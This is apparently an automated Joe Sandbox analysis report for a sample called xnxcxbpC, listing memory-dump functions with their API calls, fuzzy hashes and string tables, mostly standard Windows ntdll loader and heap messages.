Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
Instruction ID: 93b2374f167c02f6a28249779b1fd5adc8fce152e1fc3efdeaf84b546dfcf957
Opcode Fuzzy Hash: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
Instruction Fuzzy Hash: 4421C07294C206ABDB00E9749846ACB7774FB45318F04455AD80C9B702E739B6968BD5

Function 00417B27 Relevance: 1.5, APIs: 1, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5

Memory Dump Source

Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
Instruction ID: 520125f5abcca6f32ee259adfec299557dcb37a3b4497778880cbe12b8f3150b
Opcode Fuzzy Hash: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
Instruction Fuzzy Hash: A4F02BB190C24DABCB20CE64DC409DDBB74AF55234F0487EED998671C2E2305649C756

Function 0042CE23 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E934,?,?,00000000,?,0041E934,?,?,?), ref: 0042CE62

Memory Dump Source

Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
Instruction ID: 54a44c9eb01fc689f5ac2f601c65d0757ab140ae4e4e75f286cde17a1d142988
Opcode Fuzzy Hash: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
Instruction Fuzzy Hash: 86E06DB52042047BD620EE59EC45EEB37ADEFC5710F40441AFA48A7241CA70B9108BB9

Function 0042CEC3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?), ref: 0042CEFA

Memory Dump Source

Source File: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_xnxcxbpC.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
Instruction ID: 54eb179f5a4ec7a69d43dd70d9c2d94cb10809d16adc756a8638f1923563bae3
Opcode Fuzzy Hash: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
Instruction Fuzzy Hash: 64E04F712102147BD120EA6ADC41F9BB76CDBC5714F40802AFA08A7281C670B90187F4

Function 22AB2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 22AB2C24

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b38c96bce58053d23d91fcec307f6ef5f6293c45884fc8a8da5d850094bb2da9
Instruction ID: b4c6cf1f1d4cc7d39a3024dd9a32ffe5d16a7b65129b755db83b9422d58af0a0
Opcode Fuzzy Hash: b38c96bce58053d23d91fcec307f6ef5f6293c45884fc8a8da5d850094bb2da9
Instruction Fuzzy Hash: 4BB09B719016C5C9D601E7604B487077A147BD1702F56C072D2030681F4779C5D1F175

Non-executed Functions

Function 22AF2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

GlobalFlag, xrefs: 22AF2F3F, 22AF3059
UnloadEventTraceDepth, xrefs: 22AF24C0
DisableExceptionChainValidation, xrefs: 22AF275F
MaxLoaderThreads, xrefs: 22AF24EC
MaxDeadActivationContexts, xrefs: 22AF2D82
minkernel\ntdll\ldrinit.c, xrefs: 22AF3187
LdrpInitializeExecutionOptions, xrefs: 22AF317D
FrontEndHeapDebugOptions, xrefs: 22AF2489
DisableHeapLookaside, xrefs: 22AF246D
Initializing the application verifier package failed with status 0x%08lx, xrefs: 22AF3176
CFGOptions, xrefs: 22AF2967
UseImpersonatedDeviceMap, xrefs: 22AF251C
TracingFlags, xrefs: 22AF2549
@, xrefs: 22AF2942
MinimumStackCommitInBytes, xrefs: 22AF2BB0
RaiseExceptionOnPossibleDeadlock, xrefs: 22AF2579
GlobalFlag2, xrefs: 22AF2FC0
ShutdownFlags, xrefs: 22AF24A1
ExecuteOptions, xrefs: 22AF25A0
@, xrefs: 22AF2B74

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 54e6c44e1641107069be795fdba8bcf8616f008ab2fb54c984bdc5b1fc306100
Instruction ID: b3d7c57713d4a82731dac4877e1f3d6013936c59f0ac8b7e476aeb27bed290e3
Opcode Fuzzy Hash: 54e6c44e1641107069be795fdba8bcf8616f008ab2fb54c984bdc5b1fc306100
Instruction Fuzzy Hash: 34929D71644781ABE721CF24C980F6BB7E8BF84754F00492DFA94DBA90D7B9D844CB92

Function 22AA8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread is in a state in which it cannot own a critical section, xrefs: 22AE5543
undeleted critical section in freed memory, xrefs: 22AE542B
Thread identifier, xrefs: 22AE553A
corrupted critical section, xrefs: 22AE54C2
8, xrefs: 22AE52E3
Critical section debug info address, xrefs: 22AE541F, 22AE552E
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 22AE54CE
Invalid debug info address of this critical section, xrefs: 22AE54B6
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 22AE54E2
Critical section address, xrefs: 22AE5425, 22AE54BC, 22AE5534
Address of the debug info found in the active list., xrefs: 22AE54AE, 22AE54FA
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 22AE540A, 22AE5496, 22AE5519
double initialized or corrupted critical section, xrefs: 22AE5508
Critical section address., xrefs: 22AE5502

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 29849cf4587625664dce5acdfe84f7a73d1151cf40fc949164a0ee12c54ea0e7
Instruction ID: 68b20a93912d020be2bae66db154fd3809c171bdb2172026331c1f49bb1a39b1
Opcode Fuzzy Hash: 29849cf4587625664dce5acdfe84f7a73d1151cf40fc949164a0ee12c54ea0e7
Instruction Fuzzy Hash: F0816B71E00358AFEB10CF95C980FAEBBB5BF08714F504169F909B7A80D775A981CBA0

Function 22AA29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 22AE24C0
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 22AE2412
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 22AE2498
RtlpResolveAssemblyStorageMapEntry, xrefs: 22AE261F
@, xrefs: 22AE259B
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 22AE22E4
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 22AE2602
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 22AE25EB
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 22AE2409
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 22AE2624
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 22AE2506

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 5f53b86188ababccbe7189a4c12dbf3e47e0e7f283278f7c68cdba296fca6f8f
Instruction ID: e29d5044ace29b7686232267f6e4ea1bfebfe51a20acd4762561ed52c49de0a1
Opcode Fuzzy Hash: 5f53b86188ababccbe7189a4c12dbf3e47e0e7f283278f7c68cdba296fca6f8f
Instruction Fuzzy Hash: 62024CF1D403289BDB21CF14CD90B9AB7B8AF54304F1041EAA60DA7641EBB19F95CF69

Function 22B18B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 22B18BD0
heapType, xrefs: 22B18BCB
svchost.exe, xrefs: 22B18B68
SegmentHeap, xrefs: 22B18BE9
csrss.exe, xrefs: 22B18B80
DefaultBrowser_NOPUBLISHERID, xrefs: 22B18D00
runtimebroker.exe, xrefs: 22B18B73
lsass.exe, xrefs: 22B18BA1
services.exe, xrefs: 22B18B96
smss.exe, xrefs: 22B18B8B

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 28db57a08d6f7420c75c4856c2dbd23338ab9ebea0700b0f413d5bba576ec302
Instruction ID: 5dba48e2f6dd8d55fc5f47db54bf42226c27d74f29f6d3a5e1c7398ee7b61dfb
Opcode Fuzzy Hash: 28db57a08d6f7420c75c4856c2dbd23338ab9ebea0700b0f413d5bba576ec302
Instruction Fuzzy Hash: E351BFB16053859BEB25CF148A80BABB7FCFF94344F904A1DEA58C3651EB70D644CB92

Function 22B20274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Just reallocated block at %p to %Ix bytes, xrefs: 22B205F1
RtlReAllocateHeap, xrefs: 22B202BF, 22B20362
HEAP: , xrefs: 22B203A6, 22B204B5, 22B205DD, 22B20682, 22B206D9
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 22B206EA
About to reallocate block at %p to %Ix bytes, xrefs: 22B203BA
HEAP[%wZ]: , xrefs: 22B20399, 22B204A8, 22B205D0, 22B20675, 22B206CC
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 22B204D3
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 22B2069F

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 729f9445f1f1dce2d128b69271c61e540284a9b0af21fe6e3f665d39b61b1978
Instruction ID: f3cb1d312ed9630137ddf23780acb2c27906ad754611142e5b704aea7457184b
Opcode Fuzzy Hash: 729f9445f1f1dce2d128b69271c61e540284a9b0af21fe6e3f665d39b61b1978
Instruction Fuzzy Hash: 54D1E131600B85DFDB12CF64C580ABDBBF1FF6A704F048A59E8599BA6AC735D981CB10

Function 22AF89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: -*- final list of providers -*- , xrefs: 22AF8B8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 22AF8A3D
HandleTraces, xrefs: 22AF8C8F
VerifierDlls, xrefs: 22AF8CBD
VerifierFlags, xrefs: 22AF8C50
VerifierDebug, xrefs: 22AF8CA5
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 22AF8A67

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 38d89a0e4b5ade65e34386f93378e274c0e03f1865e489d875e39ffe75d8c64a
Instruction ID: b75edba17cabff1a57a7b775dde002004871743165eaf10b582d3e979db388ae
Opcode Fuzzy Hash: 38d89a0e4b5ade65e34386f93378e274c0e03f1865e489d875e39ffe75d8c64a
Instruction Fuzzy Hash: 27910472686701AFD311DF28CAC0F2A77A4BF54794F910958FB80ABA94C73E9C11CB91

Function 22A7EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

T, xrefs: 22A7EB4E
LdrpResSearchResourceInsideDirectory Enter, xrefs: 22A7EB58
, xrefs: 22A7F299
R, xrefs: 22A7EB62
LdrpResSearchResourceInsideDirectory Exit, xrefs: 22A7EB6C
{, xrefs: 22AD4643

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 7db1a537bce332aebd82d3f399d2a4557cdcc47d2ab7ee08c7f43f1b305f5b97
Instruction ID: 9df37c2b1be1d24e22f80bb4785bc423b6d6e3157f6b1f8de89fff405470fea1
Opcode Fuzzy Hash: 7db1a537bce332aebd82d3f399d2a4557cdcc47d2ab7ee08c7f43f1b305f5b97
Instruction Fuzzy Hash: 99A23675A0576A8BDB68CF19CE98BADB7B1BF44304F1042E9D918A7A50DB309E84CF44

Function 00402870 Relevance: 7.8, Strings: 6, Instructions: 273COMMON

Download Yara Rule

Strings

gfff, xrefs: 00402930
VUUU, xrefs: 00402951
^, xrefs: 00402896
gfff, xrefs: 00402B21
<, xrefs: 004029D8
yxxx, xrefs: 004029B0

Memory Dump Source

Source File: 00000005.00000001.2240612086.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: <$VUUU$^$gfff$gfff$yxxx
API String ID: 0-316815425
Opcode ID: b4c5ea56440ed441900d5c47d19ed93f1dc6d542dd1d6fd463edbf0af6dc037a
Instruction ID: acdc47fa774a7f9690a8a9d900611673f9bdcf880e58a562d9d8aaaed250525f
Opcode Fuzzy Hash: b4c5ea56440ed441900d5c47d19ed93f1dc6d542dd1d6fd463edbf0af6dc037a
Instruction Fuzzy Hash: 6B81D471B005054BDF2CCD5DDA987AA73A6EBD4304F28817AD809EF3D1EA799E058A44

Function 22AA63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

_LdrpInitialize, xrefs: 22AE40DF, 22AE4141, 22AE4205, 22AE425F
Delaying execution failed with status 0x%08lx, xrefs: 22AE4258
minkernel\ntdll\ldrinit.c, xrefs: 22AE40E9, 22AE414B, 22AE420F, 22AE4269
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 22AE40D8
Process initialization failed with status 0x%08lx, xrefs: 22AE413A
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 22AE41FE

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: d479b1527a382054bdad1f9cdddbfd4e622f940aa2b32d22c592144f3dea4089
Instruction ID: 3d8c8e45742accccc0415bd949857145aa3c388e38b4b663fee3ec047a25da96
Opcode Fuzzy Hash: d479b1527a382054bdad1f9cdddbfd4e622f940aa2b32d22c592144f3dea4089
Instruction Fuzzy Hash: 78910770B403159BEB15CF64CB94BAA77B4BF54B58F000129EA156BFC9D7789802CB91

Function 22A6645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Getting the shim user exports failed with status 0x%08lx, xrefs: 22AC9A01
LdrpInitShimEngine, xrefs: 22AC99F4, 22AC9A07, 22AC9A30
Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 22AC99ED
Loading the shim user DLL failed with status 0x%08lx, xrefs: 22AC9A2A
apphelp.dll, xrefs: 22A66496
minkernel\ntdll\ldrinit.c, xrefs: 22AC9A11, 22AC9A3A

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 05844546c50e0e043dee76410a44cde2828841be8605334043e0a1d6b33a12c2
Instruction ID: 8d1ad159583b3fce5eeee18979177f0e7dd13ee640d0aa755bed813ca5c9c9f2
Opcode Fuzzy Hash: 05844546c50e0e043dee76410a44cde2828841be8605334043e0a1d6b33a12c2
Instruction Fuzzy Hash: D951BEB16483019FE724CF24CA81F7B77E4BF84B84F000A19FA959B991DB34D905CB92

Function 22AAC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 22AE81E5
LdrpInitializeProcess, xrefs: 22AAC6C4
Loading import redirection DLL: '%wZ', xrefs: 22AE8170
minkernel\ntdll\ldrinit.c, xrefs: 22AAC6C3
LdrpInitializeImportRedirection, xrefs: 22AE8177, 22AE81EB
minkernel\ntdll\ldrredirect.c, xrefs: 22AE8181, 22AE81F5

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: a009ab3b916a30b45dd253b8a98939d5f766d9148302c26de2904779c757e639
Instruction ID: 284dd56bd51518a6aa158504ac0ca794737e14eb084c9f9a6ae5acaa1cd1768c
Opcode Fuzzy Hash: a009ab3b916a30b45dd253b8a98939d5f766d9148302c26de2904779c757e639
Instruction Fuzzy Hash: 903105B17847419FE210DF28CE81E2BB7E5FFD4B54F000968F9456BA91E620DC05C7A2

Function 22AA2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 22AE2165
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 22AE21BF
RtlGetAssemblyStorageRoot, xrefs: 22AE2160, 22AE219A, 22AE21BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 22AE219F
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 22AE2180
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 22AE2178

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 9cd3f46dcc97cbd77067137083a959e9ec52c0e87a3a5018173ff3ebab35338b
Instruction ID: 28ab5660a3bc89a01d972011a655940a900fb4e10fefe23963f0a3911fb95227
Opcode Fuzzy Hash: 9cd3f46dcc97cbd77067137083a959e9ec52c0e87a3a5018173ff3ebab35338b
Instruction Fuzzy Hash: 37310232F00314BBE7218A958DD0F9B7778EFA5B84F110069FB09B7A44D6B09B11C7A1

Function 22AB096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 22AB2DF0: LdrInitializeThunk.NTDLL ref: 22AB2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22AB0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22AB0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22AB0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 22AB0D74

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 50641d109f6621b8b642da67107df56b07403d9965f540b32bed129b221cd2c4
Instruction ID: 0de12fd00f70056b576a707c910b40532434511d9e2ab54782f8f2f0d88ed9a9
Opcode Fuzzy Hash: 50641d109f6621b8b642da67107df56b07403d9965f540b32bed129b221cd2c4
Instruction Fuzzy Hash: FE428E75A00705DFDB21CF24C981BAAB7F8FF14304F1445AAE999EB641E770AA85CF60

Function 22AFCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 22AFCFBD

Strings

@, xrefs: 22AFCF0A
@4Cw@4Cw, xrefs: 22AFCFD5, 22AFCFDA, 22AFCFF1

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: b88026a9ffd8b3e66c2f7ae3acc209fe1e249089e8d14939bf9c1a8d91ff77d5
Instruction ID: bc2525fa501b6800f63e2d215868ad4f837c6231c481bffc8a0826e854f86892
Opcode Fuzzy Hash: b88026a9ffd8b3e66c2f7ae3acc209fe1e249089e8d14939bf9c1a8d91ff77d5
Instruction Fuzzy Hash: 2D419F72A40754DFCB22CFA5CA80A7DBBB8FF54B04F00452AF915DBA55D7398901CB61

Function 22A7A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 22A7A3E7
6, xrefs: 22A7A3F7
LdrResFallbackLangList Enter, xrefs: 22A7A3EF
LdrResFallbackLangList Exit, xrefs: 22A7A3FF

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 7a743b340f471e1d5c853a9a76c89a618c13d063c8d68ae0218a2f216bcc6153
Instruction ID: 3b9730d261928a15dd1a4d339f96384ce83857c1191502d0983a0f9909881fd3
Opcode Fuzzy Hash: 7a743b340f471e1d5c853a9a76c89a618c13d063c8d68ae0218a2f216bcc6153
Instruction Fuzzy Hash: 92C16B75208382DFC711CF14CA84B5EB7F4BF84708F00496AF9968BA52E779CA45CB5A

Function 22AA8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 22AA8422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 22AA855E
@, xrefs: 22AA8591
minkernel\ntdll\ldrinit.c, xrefs: 22AA8421

Memory Dump Source

Source File: 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22a40000_xnxcxbpC.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 0c422fcbf54a692a5d87b4919c370ada97e4b98d5f1f4f27dbcbf43734a4c29f
Instruction ID: cf0a034693e50649f7dda55e7ecbe868184862fea22080e39b0b2c5763a5d639
